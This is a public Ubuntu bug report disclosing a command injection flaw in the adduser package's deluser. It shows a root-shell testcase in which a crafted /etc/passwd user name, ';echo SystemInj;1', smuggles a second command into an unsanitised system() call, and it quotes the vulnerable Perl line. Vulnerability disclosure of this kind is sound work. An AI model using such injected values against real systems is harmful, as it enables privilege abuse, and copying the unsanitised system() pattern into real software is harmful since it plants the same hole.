Ubuntu
adduser package

command injection in deluser

Bug #782170 reported by Emanuel Bronshtein
6
This bug affects 1 person
Affects Status Importance Assigned to Milestone
adduser (Ubuntu)
New
Undecided
Unassigned

Bug Description

Binary package hint: adduser

/usr/sbin/deluser have command injection bug .

testcase :
root@emanuel-desktop:/tmp# echo ";echo SystemInj;1:x:9898:9899:,,,:/home/Sysinj:/bin/bash" >> /etc/passwd
root@emanuel-desktop:/tmp# /usr/sbin/deluser ";echo SystemInj;1"
no crontab for root
SystemInj
Removing user `;echo SystemInj;1' ...
Warning: group `' has no more members.
Done.

the bug can be found at :
    if (system("crontab -l $user >/dev/null 2>&1") == 0) {

To post a comment you must log in.
This report contains Public information  
Everyone can see this information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.